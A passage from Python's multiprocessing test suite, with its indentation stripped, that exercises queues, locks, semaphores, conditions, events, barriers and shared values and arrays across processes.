self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
